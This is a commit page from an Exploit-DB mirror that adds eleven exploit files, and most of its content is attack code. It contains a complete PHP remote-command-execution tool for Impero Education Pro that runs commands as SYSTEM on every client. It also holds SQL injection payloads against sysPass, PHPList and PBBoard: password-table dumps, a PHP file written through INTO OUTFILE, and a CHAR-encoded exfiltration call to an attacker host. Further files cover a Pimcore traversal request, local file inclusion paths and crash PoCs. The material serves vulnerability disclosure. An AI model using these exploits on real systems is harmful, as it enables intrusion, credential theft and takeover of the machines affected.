bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-07-15

Browse source 
11 new exploits
This commit is contained in:
Offensive Security 2015-07-15 05:01:36 +00:00
parent 5d9a8808ca
commit 111bcdca4a
12 changed files with 706 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

11
files.csv
View file

@ -33943,3 +33943,14 @@ id,file,description,date,author,platform,type,port
37602,platforms/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80
37603,platforms/php/webapps/37603.txt,"WordPress CP Contact Form with Paypal Plugin 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80
37604,platforms/php/webapps/37604.txt,"SO Planning 1.32 - Multiple Vulnerabilities",2015-07-13,"Huy-Ngoc DAU",php,webapps,80
37607,platforms/windows/dos/37607.py,"Internet Download Manager - (.ief) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
37608,platforms/windows/dos/37608.py,"Internet Download Manager - (Find Download) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
37609,platforms/xml/webapps/37609.txt,"Pimcore CMS Build 3450 - Directory Traversal",2015-07-14,Portcullis,xml,webapps,0
37610,platforms/php/webapps/37610.txt,"sysPass 1.0.9 - SQL Injection",2015-07-14,"SySS GmbH",php,webapps,0
37611,platforms/windows/remote/37611.php,"Impero Education Pro - SYSTEM Remote Command Execution",2015-07-14,slipstream,windows,remote,0
37612,platforms/windows/dos/37612.py,"ZOC Terminal Emulator 7 - (Quick Connection) Crash PoC",2015-07-14,"SATHISH ARTHAR",windows,dos,0
37613,platforms/php/webapps/37613.txt,"PHPList 2.10.18 'index.php' SQL Injection Vulnerability",2012-08-08,"High-Tech Bridge SA",php,webapps,0
37614,platforms/php/webapps/37614.txt,"PBBoard index.php Multiple Parameter SQL Injection",2012-08-08,"High-Tech Bridge",php,webapps,0
37615,platforms/php/webapps/37615.txt,"PBBoard member_id Parameter Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0
37616,platforms/php/webapps/37616.txt,"PBBoard admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0
37617,platforms/php/webapps/37617.txt,"dirLIST Multiple Local File Include and Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0

Can't render this file because it is too large.

182
platforms/php/webapps/37610.txt Executable file
View file

@ -0,0 +1,182 @@
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2015-031
Product: sysPass
Vendor: http://cygnux.org/
Affected Version(s): 1.0.9 and below
Tested Version(s): 1.0.9
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: High
Solution Status: Fixed
Vendor Notification: 2014-07-27
Solution Date: 2014-08-04
Public Disclosure: 2015-07-13
CVE Reference: Not yet assigned
Author of Advisory: Daniele Salaris (SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
sysPass is an web based Password Manager written in PHP and Ajax with a
built-in multiuser environment.
An SQL injection vulnerability could be identified in one of the requests
of this web password manager.
The software manufacturer describes the web application as follows
(see [1]):
"sysPass is a web password manager written in PHP that allows the
password management in a centralized way and in a multiuser environment.
The main features are:
* HTML5 and Ajax based interface
* Password encryption with AES-256 CBC.
* Users and groups management.
* Advanced profiles management with 16 access levels.
* MySQL, OpenLDAP and Active Directory authentication.
* Activity alerts by email.
* Accounts change history.
* Accounts files management.
* Inline image preview.
* Multilanguage.
* Links to external Wiki.
* Portable backup.
* Action tracking and event log.
* One-step install process."
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The SQL injection vulnerability was found in an HTTP post request of the
AJAX component from the sysPass software.
The attribute getAccounts is not correctly sanitized and therefore can be
abused to inject arbitrary SQL statements.
This SQL injection vulnerability can be exploited by an authenticated
attacker by sending a specially crafted HTTP POST request (see PoC
section).
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The following HTTP request can be used to extract information from the
database:
POST /sysPass-1.0.9/ajax/ajax_search.php HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<HOST>/sysPass-1.0.9/index.php
Content-Length: 249
Cookie: PHPSESSID=<SESSIONID>
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
search=getAccounts') UNION ALL SELECT NULL,NULL,account_name,account_login,account_pass,account_url,NULL,NULL,NULL,NULL,NULL from accounts -- &start=0&skey=1&sorder=1&sk=081bad3198bdb3cd29133befc57d60287541663b&is_ajax=1&customer=0&category=0&rpp=10
The server answers as followed:
HTTP/1.1 200 OK
Date: Fri, 10 Jul 2015 14:06:04 GMT
Server: Apache/2.4.12 (Unix) PHP/5.6.10
X-Powered-By: PHP/5.6.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=<SESSIONID>; path=/; HttpOnly
Content-Length: 1147
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<div id="data-search-header" class="data-header"><ul class="round header-grey"><li class="header-txt"><a onClick="searchSort(5,0)"
title="Sort by Customer" >Customer</a></li><li class="header-txt"><a onClick="searchSort(1,0)" title="Sort by Name">Name</a><img
src="imgs/sort_desc.png" class="icon" /></li><li class="header-txt"><a onClick="searchSort(2,0)" title="Sort by Category">Category</a></li><li
class="header-txt"><a onClick="searchSort(3,0)" title="Sort by Username">User</a></li><li class="header-txt"><a onClick="searchSort(4,0)"
title="Sort by URL / IP">URL / IP</a></li></ul></div><div id="data-search" class="data-rows"><ul><li class="cell-txt txtCliente"></li><li
class="cell-txt">TEST_USER</li><li class="cell-txt">TEST_NAME</li><li class="cell-txt"><DATA></li><li
class="cell-txt">TEST_URL</li><li class="cell-img"><img src="imgs/btn_group.png" title="Groups:<br><br>*<br>" /></li><li
class="cell-actions round"></li></ul></div><div id="pageNav" class="round shadow"><div id="pageNavLeft">1 @ 0.00478 s
<span id="txtFilterOn" class="round">Filter ON</span></div><div id="pageNavRight">&nbsp; 1 / 1 &nbsp;</div></div>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
Update sysPass to the latest software version.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2014-07-27: Vulnerability discovered
2014-07-27: Vulnerability reported to vendor
2014-08-04: Vendor releases new fixed version of sysPass
2015-07-13: Public release of security advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Web site of sysPass - sysadmin password manager
http://wiki.syspass.org/en/start
[2] SySS Security Advisory SYSS-2015-031
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-031.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Daniele Salaris of the SySS GmbH.
E-Mail: disclosure (at) syss.de
Key fingerprint = E135 4E23 6091 A85C 9E14 577A 28DF B3A7 0A98 A9D4
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
iQIcBAEBCgAGBQJVo3V1AAoJECjfs6cKmKnUUgQQALxneKA1L6DQmcqbCf5X1ji1
UGoSwkpdsvfMAJOeQ5IlpLKd1hYWl3NkeheD74nBZ0YoNjLc9I3uSh1u0Xi25kRu
xI6RTgWNtroHRYeVN8v2qPFiABXKUxc9zdsEVNLz2PNNU4mbmzaeszrrK3XU7Z/+
dMjGvAr7b+qWMD3N+l5zSqrh4KMpnmu6XAJSKJM3az6FECsdXFKF7w2DlAr39vrP
cCkXrN9ekSkEN2wuvh8O3kGQ7T9hsxHCsSGwclb4gUqAVQ4aLcoL782HQulhW3/J
sMWm3s7PLo0Q10RMhdoJgGKCZfAbn9L2HfjuvXO4YznEjjp/bTwLw3DIGqNSmF3q
aqFbFZxxgW45JIV9sIfa+A17Q8DZAdsZNLoEOTcznBd9S46qn/ohWhZVOIypof8y
J3hVMlYYTL52kKEDR2QlVwsNzmfeyE3bmTkUjJD8STz/stQi2shDXQhFe3uJKMna
gtYh/US+GbWtPvll0NLOlNT9kG+Eytsuj5dgdwMZ82JV3wCyEL6IgbhXpAAAlt9Y
UQ4Zv6kNLJt2XF3Sws+DXtp5S0bdE5MrKJSa9zUjj38+YmCg+TMMRIgs6U2YGnlk
JHOrIUZzveTTZ0AXIE/HXFGWnuMOEPjoZBh97y9xdUSej3Wo+knjUrarVfv8PCaG
GBBy6/A3qHLaOsoxWX0i
=ZrwB
-----END PGP SIGNATURE-----

13
platforms/php/webapps/37613.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/54912/info
PHPList is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to PHPList 2.10.19 are vulnerable.
http://www.example.com/admin/?page=editattributes&id=1&delete=1 union select version() --
http://www.example.com/admin/?page=editattributes&id=1&delete=1 union select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))) --
http://www.example.com/admin/?page=editattributes&id=1&delete=1 union select char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62) --

48
platforms/php/webapps/37614.txt Executable file
View file

@ -0,0 +1,48 @@
source: http://www.securityfocus.com/bid/54916/info
PBBoard is prone to multiple security vulnerabilities including:
1. Multiple SQL-injection vulnerabilities
2. A security-bypass vulnerability
3. An arbitrary file upload vulnerability
Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.
PBBoard 2.1.4 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/index.php?id=1&member=1&page=send&start=1" method="post" name="main" id="main">
<input type="hidden" name="username" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="submit" name="Submit" value="Send">
</form>
<form action="http://www.example.com/index.php?page=forget&send_active_code=1" method="post" name="main" id="main">
<input type="hidden" name="email" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="submit" name="Submit" value="Send">
</form>
<form action="http://www.example.com/index.php?page=forum_archive&password_check=1&id=1" method="post" name="main" id="main">
<input type="hidden" name="password" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="submit" name="Submit" value="Send">
</form>
<form action="http://www.example.com/index.php?page=management&move=1&subject_id=1" method="post" name="main" id="main">
<input type="hidden" name="section" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="submit" name="Submit" value="Send">
</form>
<form action="http://www.example.com/index.php?page=managementreply&startdeleteposts=1&do_replys=1" method="post" name="main" id="main">
<input type="hidden" name="section_id" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="hidden" name="check[]" value="1">
<input type="submit" name="Submit" value="Send">
</form>
<form action="http://www.example.com/index.php?page=new_password&forget=1" method="post" name="main" id="main">
<input type="hidden" name="member_id" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="hidden" name="new_password" value="1">
<input type="submit" name="Submit" value="Send">
</form>
<form action="http://www.example.com/index.php?page=tags&start=1" method="post" name="main" id="main">
<input type="hidden" name="subjectid" value="' union select '<? php_code ?>',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 INTO OUTFILE '../../../path/to/site/file.php' -- ">
<input type="submit" name="Submit" value="Send">
</form>

17
platforms/php/webapps/37615.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/54916/info
PBBoard is prone to multiple security vulnerabilities including:
1. Multiple SQL-injection vulnerabilities
2. A security-bypass vulnerability
3. An arbitrary file upload vulnerability
Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.
PBBoard 2.1.4 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/index.php?page=new_password&forget=1" method="post" name="main" id="main">
<input type="hidden" name="member_id" value="1">
<input type="hidden" name="new_password" value="new_password">
<input type="submit" name="Submit" value="Send">
</form>

17
platforms/php/webapps/37616.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/54916/info
PBBoard is prone to multiple security vulnerabilities including:
1. Multiple SQL-injection vulnerabilities
2. A security-bypass vulnerability
3. An arbitrary file upload vulnerability
Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.
PBBoard 2.1.4 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/admin.php?page=addons&export=1&export_writing=1&xml_name=file.php" method="post" name="main" id="main">
<input type="hidden" name="context" value='<? phpinfo(); ?>'>
<input type="submit" name="Submit" value="Send">
</form>

8
platforms/php/webapps/37617.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/54933/info
dirLIST is prone to multiple local file-include vulnerabilities and an arbitrary-file upload vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
http://www.example.com/dirlist_0.3.0/dirLIST_files/gallery_files/show_scaled_image.php?image_path=../../../../../windows/win.ini
http://www.example.com/irlist_0.3.0/dirLIST_files/thumb_gen.php?image_path=../../../../../windows/win.ini

32
platforms/windows/dos/37607.py Executable file
View file

@ -0,0 +1,32 @@
#!/usr/bin/env python
# Title : Internet Download Manager - Crash Proof Of Concept
# Affected Versions: All Version
# Founder : InternetDownloadManager
# Tested on Windows 7 / Server 2008
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
#
#
# downlWithIDM64.dll Exploit
#
#
# 1 . run python code : python crash.py
# 2 . open "IDM"
# 3 . Tasks --> Import --> From IDM export file
# 4 . select r3z4.ief
# 5 . Crashed ;)
hdr = "<" #start syntax
hcr = "ftp://" #pro
crash = "\x41"*1992999 #B0F
exp = hdr+hcr+crash+hdr+hcr+crash
file = open("r3z4.ief", "w")
file.write(exp)
file.close()

31
platforms/windows/dos/37608.py Executable file
View file

@ -0,0 +1,31 @@
#!/usr/bin/env python
# Title : Internet Download Manager - Crash Proof Of Concept
# Affected Versions: All Version
# Founder : InternetDownloadManager
# Tested on Windows 7 / Server 2008
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
#
#
# downlWithIDM64.dll Exploit
#
#
# 1 . run python code : python crash.py
# 2 . open r3z4.txt and copy content to clipboard
# 3 . open "IDM"
# 4 . From Menu , Downloads --> Find
# 5 . Paste ClipBoard on "File name or part of the name"
# 6 . Click Find
# 7 . Crashed ;)
crash = "\x41"*10000 #B0F
file = open("r3z4.txt", "w")
file.write(crash)
file.close()

33
platforms/windows/dos/37612.py Executable file
View file

@ -0,0 +1,33 @@
#!/usr/bin/python
#[+] Author: SATHISH ARTHAR
#[+] Exploit Title: ZOC Terminal Emulator-v7 Memory Corruption PoC
#[+] Date: 14-07-2015
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows7/windows8
#[+] Vendor: http://www.emtec.com
#[+] Download: http://www.emtec.com/downloads/zoc/zoc7051.exe
#[+] Sites: sathisharthars.wordpress.com
#[+] Twitter: @sathisharthars
#[+] Thanks: offensive security (@offsectraining)
print"###########################################################"
print"# Title: ZOC Terminal Emulator-v7 Memory Corruption PoC #"
print"# Author: SATHISH ARTHAR #"
print"# Category: DoS/PoC # "
print"###########################################################"
print"Copy the content of CRASH.TXT in connect to option and set Connection type to Windows Modems"
print" Quick Connection ----> Connection type: Windows Modems ----> connect"
crash= "A" * 200
filename = "CRASH.TXT"
file = open(filename , "w")
file.write(crash)
print "\n Files Created!\n"
file.close()

196
platforms/windows/remote/37611.php Executable file
View file

@ -0,0 +1,196 @@
/*
If you're unsure what Impero is, it's essentially a corporate/educational RAT. Vendor site: https://www.imperosoftware.co.uk/
They recently were in the news about how they implemented "anti-radicalisation" shit or something.
They had a booth at BETT back in January. They gave out donuts. Those were nice. Unfortunately, when I asked about their security, nobody answered me.
Some reversing later, looks like Impero is completely pwned amirite.
The proprietary Impero protocol on the wire is encrypted. With AES-128 CBC. And a hardcoded key and iv that are both derived from sha512(Imp3ro). ISO10126 padding is used.
After connection, a client must authenticate. This is done by sending "-1|AUTHENTICATE\x02PASSWORD". Not even joking here. "PASSWORD" is a seperate string though, so it might be different for some special clients maybe. No idea.
Then, we have full range to do whatever we want. My PoC also does negotiatiation, but I'm not sure if that's needed.
We can get a list of clients with the "SENDCLIENTS" command, then send all the IDs to "SENDCOMMANDMSG" (run CLI command as SYSTEM), or OPENFILE (run visibly an EXE under whatever user, including SYSTEM), or other protocol commands, etc.
There's an OSX version, but I haven't properly looked into that. Run my PoC with the right args and it pops calc on every Windows client as SYSTEM. It also runs "whoami > c:\lol.txt", also as SYSTEM. This second one gets logged serverside, but the server logs it as "unknown" as it doesn't know what client did it.
Basically, if you use Impero, please don't.
Oh yeah -- free speech for the win... internet censorship is <insert some expletives here>, and so are any and all RATs.
- slipstream / RoL^LHQ - @TheWack0lian
PoC code follows. In PHP because lol. PoC works on at least 5.x (latest).
*/
<?php
// Impero Education Pro SYSTEM-RCE PoC
// by slipstream/RoL^LHQ
// greets to everyone in lizardhq! :)
function PadString($str) {
$size = 16;
$pad = $size - (strlen($str) % $size);
$padstr = '';
for ($i = 1; $i < $pad; $i++)
$padstr .= chr(mt_rand(0,255));
return $str.$padstr.chr($pad);
}
function UnPadString($str) {
return substr($str,0,-(ord(substr($str,-1))));
}
function CryptString($str) {
$hash = hash('sha512','Imp3ro',true);
$key = substr($hash,0,0x20);
$iv = substr($hash,0x20,0x10);
$crypted = mcrypt_encrypt(MCRYPT_RIJNDAEL_128,$key,PadString($str),'cbc',$iv);
return $crypted;
}
function DecryptString($str) {
$hash = hash('sha512','Imp3ro',true);
$key = substr($hash,0,0x20);
$iv = substr($hash,0x20,0x10);
return UnPadString(mcrypt_decrypt(MCRYPT_RIJNDAEL_128,$key,$str,'cbc',$iv));
}
function SendNetwork($h,$str) {
global $socketid;
$crypted = CryptString($socketid."|".$str);
socket_write($h,strlen($crypted).'|'.$crypted);
return;
}
function RecvNetwork($h) {
$len = '';
$chr = '';
do {
$len .= $chr;
$chr = socket_read($h,1);
} while ($chr != '|');
$len = (int)($len);
if ($len < 1) die("Something's wrong. Length isn't an int.");
socket_set_block($h);
$crypted = socket_read($h,$len);
$dec = DecryptString($crypted);
global $socketid;
$dec = explode('|',$dec,2);
if ($socketid == -1) $socketid = $dec[0];
return $dec[1];
}
function Connect($host,$port = 30015) {
echo "Connecting...";
$h = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
socket_set_block($h);
if ((!$h) || (!socket_connect($h,$host,$port))) {
echo "failed.\n";
return false;
}
echo "done!\nAuthenticating...";
// authenticate
SendNetwork($h,"AUTHENTICATE\x02PASSWORD");
echo "done!\nWaiting for response...";
// we should get "AUTH:OK" back
$data = RecvNetwork($h);
if ($data != "AUTH:OK") {
echo "authentication failed.\n";
return false;
}
echo "authentication succeeded!\nNegotiating...";
SendNetwork($h,"PING1\x02IE11WIN7\x03\x035003\x019f579e0f20cb18c8bc1ee4f2dc5d9aeb\x01c0d3fd41a05add5e6d7c8b64924bef86\x018dc3a6ceec8a51e1fd2e7e688db44417\x01d1554e349fc677e6011309683ac1b85b\x012b94f70093e484b8fc7f62a4670377ea");
// we get sent 4 loads of packets. discard all.
for ($i = 0; $i < 4; $i++) {
RecvNetwork($h);
usleep(500000);
}
//SendNetwork($h,"-1|ANNOUNCE\x01600\x012\x01-1\x02IE11WIN7\x03IEUser\x03\x031\x03\x030\x031\x036\x0308:00:27:85:C5:CD,08:00:27:D0:C2:E1\x0310.0.2.15,192.168.56.101\x035003\x032015-06-11 12:17:19\x0310.0.2.255,192.168.56.255\x03None,Everyone,Users,INTERACTIVE,CONSOLE LOGON,Authenticated Users,This Organization,Local account,LOCAL,NTLM Authentication\x035003\x032.0.50727.5485\x03IE11WIN7\x03NODOMAIN");
echo "done!\n";
return $h;
}
function GetAllClients($h) {
$pline = "SENDCLIENTS\x01604\x011\x010\x02";
echo "Getting all clients...";
SendNetwork($h,$pline);
$data = RecvNetwork($h);
// grab the base64 blob
$data = array_pop(explode("\x02",$data));
// unbase64 and uncompress
$data = gzdecode(base64_decode($data));
$ret = array();
foreach (explode("\r\n",$data) as $line) {
// we only care about clientIDs
$ret[] = array_shift(explode("\x03",$line));
}
echo "done!\n";
return $ret;
}
function RunCmd($h,$ids,$cmdline) {
global $socketid;
$ids = implode(',',$ids);
$pline = "ECHO\x01\x01".$ids."\x01SENDCOMMANDMSG\x010\x02\x01\x01".$cmdline;
echo "Sending evil RunCMD data...";
SendNetwork($h,$pline);
echo "done!\n";
// if this was a real proper negoiated client we'd get something back
// however, we aren't, and we're masquerading as client #0; thus, we don't.
// this does show up in logs, with the executed command. however, the server doesn't know who ran it, so it shows up as "unknown". :)
}
function RunExeAsSystem($h,$ids,$exe) {
global $socketid;
$ids = implode(',',$ids);
$pline = "ECHO\x01\x01".$ids."\x01OPENFILE\x010\x02".$exe."\x08\x08NT AUTHORITY\SYSTEM\x08Password";
echo "Sending evil RunEXE data...";
SendNetwork($h,$pline);
echo "done!\n";
// we don't get a response from this one
}
function FindImperoServer($if,$addr) {
$sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
socket_set_option($sock, SOL_SOCKET, SO_BROADCAST, 1);
socket_set_option($sock,SOL_SOCKET,IP_MULTICAST_IF,$if);
$str = "ARE_YOU_IMPERO_SERVER";
socket_sendto($sock, $str, strlen($str), MSG_DONTROUTE, $addr, 30016);
socket_set_option($sock,SOL_SOCKET,SO_RCVTIMEO,array("sec"=>6,"usec"=>0));
$r = socket_recvfrom($sock, $buf, 18, 0, $remote_ip, $remote_port);
if ($buf == "I_AM_IMPERO_SERVER") return $remote_ip;
return false;
}
$socketid = -1;
echo "[*] Impero Education Pro SYSTEM-RCE PoC by slipstream/RoL^LHQ\n";
if ($argc < 2) {
echo "[-] Usage: ".$argv[0]." <serverIPs space-delimited>\n";
echo "[*] If you pass \"detect <if> <broadcastmask>\" (without quotes) as serverIP then we will try to find an impero server, using interface and broadcast mask given.\n";
echo "[*] Example of this: ".$argv[0]." detect vboxnet0 192.168.56.255\n";
echo "[*] This PoC will pop a calc and run whoami > C:\lol.txt as SYSTEM on *every connected client*!\n";
die();
}
array_shift($argv);
foreach ($argv as $key=>$arg) {
$detected = false;
if ($arg == "detect") {
if ($key + 2 >= count($argv)) continue;
echo "[*] Finding Impero server...\n";
$arg = FindImperoServer($argv[$key+1],$argv[$key+2]);
if ($arg == false) die("[-] Cannot find Impero server\n");
echo "[+] Found Impero server at ".$arg."\n";
$detected = true;
}
$h = Connect($arg);
if ($h === false) continue;
$clients = GetAllClients($h);
RunExeAsSystem($h,$clients,"calc");
RunCmd($h,$clients,"whoami > C:\lol.txt");
echo "\n";
if ($detected) die();
}

118
platforms/xml/webapps/37609.txt Executable file
View file

@ -0,0 +1,118 @@
Vulnerability title: Directory Traversal/Configuration Update In Pimcore CMS
CVE: CVE-2015-4425
Vendor: Pimcore
Product: Pimcore CMS
Affected version: Build 3450
Fixed version: Build 3473
Reported by: Josh Foote
Details:
It is possible for an administrative user with the 'assets' permission to overwrite system configuration files via exploiting a directory traversal vulnerability.
The following request can be used to update the system.xml file of the web application:
POST /admin/asset/add-asset-compatibility/?parentId=1&dir=../config HTTP/1.1
Host: pimcore.com
Connection: keep-alive
Content-Length: 1502
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://www.host.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: multipart/form-data; boundary=--------2072505619
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=nnmupv1knofcpdgjdnivdr4v27; cookie-warn=true; _ga=GA1.2.1941920115.1426505099; pimcore_admin_sid=j79b6ad4afkjimslbj8l5ifuo4
----------2072505619
Content-Disposition: form-data; name="Filedata"; filename="system.xml"
Content-Type: application/xml
<?xml version="1.0"?>
<zend-config xmlns:zf="http://framework.zend.com/xml/zend-config-xml/1.0/">
<general>
<timezone>Europe/Berlin</timezone>
<language>en</language>
<validLanguages>en</validLanguages>
<debug>1</debug>
<debugloglevel>debug</debugloglevel>
<custom_php_logfile>1</custom_php_logfile>
</general>
<database>
<adapter>Mysqli</adapter>
<params>
<username>root</username>
<password>PASSWORD</password>
<dbname>pimcore</dbname>
<host>localhost</host>
<port>3306</port>
</params>
</database>
<documents>
<versions>
<steps>10</steps>
</versions>
<default_controller>default</default_controller>
<default_action>default</default_action>
<error_pages>
<default>/</default>
</error_pages>
<createredirectwhenmoved/>
<allowtrailingslash>no</allowtrailingslash>
<allowcapitals>no</allowcapitals>
<generatepreview>1</generatepreview>
</documents>
<objects>
<versions>
<steps>10</steps>
</versions>
</objects>
<assets>
<versions>
<steps>10</steps>
</versions>
</assets>
<services/>
<cache>
<excludeCookie/>
</cache>
<httpclient>
<adapter>Zend_Http_Client_Adapter_Socket</adapter>
</httpclient>
</zend-config>
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-4425/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
###############################################################
This email originates from the systems of Portcullis
Computer Security Limited, a Private limited company,
registered in England in accordance with the Companies
Act under number 02763799. The registered office
address of Portcullis Computer Security Limited is:
Portcullis House, 2 Century Court, Tolpits Lane, Watford,
United Kingdom, WD18 9RS.
The information in this email is confidential and may be
legally privileged. It is intended solely for the addressee.
Any opinions expressed are those of the individual and
do not represent the opinion of the organisation. Access
to this email by persons other than the intended recipient
is strictly prohibited.
If you are not the intended recipient, any disclosure,
copying, distribution or other action taken or omitted to be
taken in reliance on it, is prohibited and may be unlawful.
When addressed to our clients any opinions or advice
contained in this email is subject to the terms and
conditions expressed in the applicable Portcullis Computer
Security Limited terms of business.
###############################################################